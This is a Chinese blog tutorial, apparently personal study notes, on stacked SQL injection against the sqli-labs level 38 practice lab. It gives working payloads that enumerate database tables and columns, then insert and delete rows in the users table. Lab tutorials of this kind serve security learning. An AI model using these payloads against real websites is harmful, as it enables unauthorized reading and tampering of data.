SQL注入-堆叠注入

最新推荐文章于 2024-02-23 02:56:35 发布
最新推荐文章于 2024-02-23 02:56:35 发布
阅读量1.3k 收藏 3
点赞数
分类专栏: 菜鸟的个人笔记 文章标签: sql 数据库 渗透测试 web安全 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_53820621/article/details/126350910
版权

SQL注入-堆叠注入

原理:

数据库支持堆叠查询,所谓堆叠查询就是执行多条语句,语句以;隔开。

image-20220815162101721

并且代码使用了支持堆叠查询的函数,列如PHP的mysqli_multi_query()

image-20220815162511956

堆叠注入就是在第二条语句中构造payload,注:页面只返回第一条语句,不返回第二条语句。

堆叠注入后果很严重,可以直接对数据库增删改。

判断注入点

环境:sqli-labs第38关。

输入?id=1' and '1?id=1' and '0,页面发生改变,存在注入,字符类型。

image-20220815164750192

image-20220815164808412

联合注入查询库,表 ,字段

判断回显的字段数,可以用order by也可以直接?id=-1' union select 1,2,3 --+测试,多了就加少了就减,最终结果为3个:image-20220815165417923

在2的位置显示数据库,3的位置显示用户名:

payload:?id=-1' union select 1,database(),user() --+:

image-20220815165522712

得出数据库名称为security后,我们查询该数据库中的表?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),user() --+

image-20220815165920701

知道表之后我们查询users表中的字段?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),user() --+image-20220815170146203

好,我们知道了users表中存在id,username,password字段。

堆叠注入的利用

上面我们知道了users表中的字段,下面我们利用堆叠注入往表中插入数据:?id=-1';insert into users(id,username,password) value(99,'wwwcn','123456'); --+:image-20220815170740267

发现没有回显,因为堆叠注入只在页面回显第一条,我们输入?id=99查看一下有没有插入进来:image-20220815171007971

可以发现我们已经成功往数据库中插入数据。

接着我们尝试删除这条数据?id=-1';delete from users where id=99 --+

image-20220815171507536

我们在输入?id=99检验一下是否删除:

image-20220815171636939

没有任何数据,说明已经被删除了。

总:

堆叠注入很少见到,但危害性极大。

小洋葱头头
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
详解SQL注入--安全(二)
09-09
主要介绍了SQL注入安全,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
sql-堆叠注入
zhhhb1005的博客
08-14 491
前几星期写题时遇见了好几道关于堆叠注入的题目,结果发现我对堆叠注入不是特别了解,所以写一下博客记录一下,但是发现堆叠注入使用的场景和条件好像有点苛刻。
sql注入堆叠注入
最新发布
m0_68976043的博客
02-23 1867
堆叠注入产生原因是因为mysql_multi_query()支持多行查询,如果没有这个函数我们使用不了堆叠注入,其次堆叠注入通过分号分隔。
SQL注入堆叠注入
qq_45691294的博客
07-16 1万+
堆叠注入原理 堆叠注入,顾名思义,就是将语句堆叠在一起进行查询 原理很简单,mysql_multi_query() 支持多条sql语句同时执行,就是个;分隔,成堆的执行sql语句,例如 select * from users;show databases; 就同时执行以上两条命令,所以我们可以增删改查,只要权限够 虽然这个注入姿势很牛逼,但实际遇到很少,其可能受到API或者数据库引擎,又或者权限的限制只有当调用数据库函数支持执行多条sql语句时才能够使用,利用mysqli_multi_query()函
MYSQL注入天书之stacked injection(堆叠注入
烟敛寒林的博客
10-24 1421
第三部分/page-3 Stacked injection Background-8 stacked injection Stacked injections:堆叠注入。从名词的含义就可以看到应该是一堆sql语句(多条)一起执行。而在真实的运用中也是这样的,我们知道在mysql中,主要是命令行中,每一条语句结尾加 ; 表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做stacked...
SQL注入——堆叠注入
nobugnomoney的博客
05-19 3131
一、堆叠注入的原理 1、介绍 在 SQL 中,分号(;)是用来表示一条 sql 语句的结束。试想一下我们在 ; 结束一个 sql 语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而 union injection(联合注入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于 union 或者 union all 执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是 任意的语句。 例如下面这个例子: 用户输入: 1; DELETE FROM products
sql注入-堆叠注入】多语句执行、结合其他注入
07-12 4093
堆叠注入】相比其他注入能执行的操作更多
sql注入知识---堆叠注入
尘玥的故事
04-11 1122
堆叠注入的使用条件十分有限,其可能受到API或者数据库引擎,又或者权限的限制只有当调用数据库函数支持执行多条sql语句时才能够使用,利用mysqli_multi_query()函数就支持多条sql语句同时执行,但实际情况中,如PHP为了防止sql注入机制,往往使用调用数据库的函数是mysqli_ query()函数,其只能执行一条语句,分号后面的内容将不会被执行,所以可以说堆叠注入的使用条件十分有限,一旦能够被使用,将可能对网站造成十分大的威胁。根据数据库类型决定是否支持多条语句执行(核心)
堆叠注入原理解析
qq_45927819的博客
03-19 7538
文章目录一、堆叠注入原理二、堆叠注入触发条件三、题目 一、堆叠注入原理 mysql数据库sql语句的默认结束符是以;结尾,在执行多条SQL语句时就要使用结束符隔开,那么在;结束一条sql语句后继续构造下一条语句,是否会一起执行? 因此这个想法也就造就了堆叠注入 二、堆叠注入触发条件 堆叠注入触发的条件很苛刻,因为堆叠注入原理就是通过结束符同时执行多条sql语句,这就需要服务器在访问数据端时使用的是可同时执行多条sql语句的方法,例如php中的mysqli_multi_query函数。但与之相对应的mysql
堆叠注入([强网杯 2019]随便注1)
热门推荐
Battery的博客
10-13 6万+
堆叠注入(Stack Injection)是一种计算机安全概念,涉及攻击者向程序的堆栈内存中插入恶意代码,以便在程序执行期间执行非预期的操作。堆栈注入攻击通常利用程序在处理函数调用时使用的堆栈机制。当一个函数被调用时,程序将在堆栈中为其分配内存以保存局部变量和返回地址。攻击者可以找到并修改这些堆栈中的值,将恶意代码插入到程序的执行流程中。堆叠注入攻击通常需要攻击者对目标程序的运行环境和代码结构有一定的了解。攻击者可能需要了解目标程序的输入格式、函数调用方式和内存管理机制等方面的知识。
第18天:WEB漏洞-SQL注入堆叠及WAF绕过注入1
08-03
1、逻辑问题 2、性能问题 3、白名单
sql injection(SQL注入)教程
10-25
sql injection(SQL注入)教程 1判断有无sql注入漏洞 2union注入 3盲注 4报错注入 5堆叠注入 6二次注入 ...
SXU-网络攻防第六次作业-sql注入进阶
12-27
把test靶场中的报错注入,时间注入堆叠注入,宽子节注入进行练习.这四个注入在127.0.0.1/test/sql/路径下﹒按破解步骤进行,至少做到爆表名这一步﹒每个步骤都要按考试要求去做:保留每次攻击的输入和执行结果截图
sqli-labs.zip
08-07
sqli-labs是一个开源且非常有学习价值的SQL注入靶场,基本上涉及到了所有的SQL注入方式,比如union注入、Boolean盲注、报错注入、时间盲注、堆叠注入、POST注入、cookie注入、UA注入、Referer注入、base64注入等等。
jsql-injection:jSQL Injection是用于自动SQL数据库注入的Java应用程序
02-02
MonetDB,MySQL,Neo4j,Netezza,NuoDB,Oracle,PostgreSQL,Presto,SQLite,SQL Server,Sybase,Teradata和Vertica 多种注入策略:正常,错误,堆叠,盲注和时间各种注入过程:默认,Zip,Dios 用于SQL和篡改...
渗透测试-SQL注入堆叠注入-攻防世界supersqli实战
保持微笑的博客
01-19 1835
1.堆叠注入原理 平常我们注入时都是通过对原来sql语句传输数据的地方进行相关修改,注入情况会因为该语句本身的情况而受到相关限制,例如一个select语句,那么我们注入时也只能执行select操作,无法进行增、删、改,其他语句也同理,所以可以说我们能够注入的十分有限。 但堆叠注入则完全打破了这种限制,其名字顾名思义,就是可以堆一堆sql注入进行注入,这个时候我们就不受前面语句的限制可以为所欲为了。其原理也很简单,就是将原来的语句构造完后加上分号,代表该语句结束,后面在输入的就是一个全新的sql语句了,这
sql注入-堆叠+二次
xiaoheizi的博客
06-28 222
判断字段,结果提示return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);首先启动并访问靶机,有一个输入框,随便输入1',发现报错了,说明可能存在sql注入。更新操作,把七个表的数据全部更新到一个总表中,因为我们在教育经历模块填写了(在创建简历时候有七个模块,每次填写完一个模块点击保存后——数据库会执行一次。打开网站会员中心,点击创建简历,填写信息,一直到教育经历。查询操作,把总表中的内容在页面展示出来,因为。
SQL注入堆叠及WAF绕过注入
av11566的博客
04-21 4465
前言 在实际的渗透测试过程中,经常会碰到网站存在WAF的情况。网站存在WAF,意味着我们不能使用安全工具对网站进行测试,因为一旦触碰了WAF的规则,轻则丢弃报文,重则拉黑IP。所以,我们需要手动进行WAF的绕过,而绕过WAF前肯定需要对WAF的工作原理有一定的理解。 所需知识 1. 堆叠查询注入 定义 Stacked injections(堆叠注入)从名词的含义就可以看到应该是一堆sql语句(多条)一起执行。而在真实 的运用中也是这样的,我们知道在mysql中,主要是命令行中,每
说明管道符注入堆叠注入
04-03
管道符注入:管道符(|)是Linux系统中的一个特殊字符,用于将一个命令的输出传递给另一个命令。在Web应用程序中,攻击者可以使用管道符将恶意命令注入到应用程序中,从而执行任意操作。例如,攻击者可以将管道符注入Web应用程序的搜索框中,然后执行诸如查看文件、创建文件、修改文件等操作。 堆叠注入堆叠注入是一种常见的SQL注入攻击技术,它利用了Web应用程序中的一个漏洞,使攻击者能够在SQL语句中插入恶意代码。攻击者可以使用多个SQL语句来执行多个操作,从而绕过应用程序的安全检查。例如,攻击者可以在Web应用程序中的登录表单中注入堆叠注入代码,然后执行多个SQL语句,以获取敏感数据或完全控制应用程序。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小洋葱头头

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值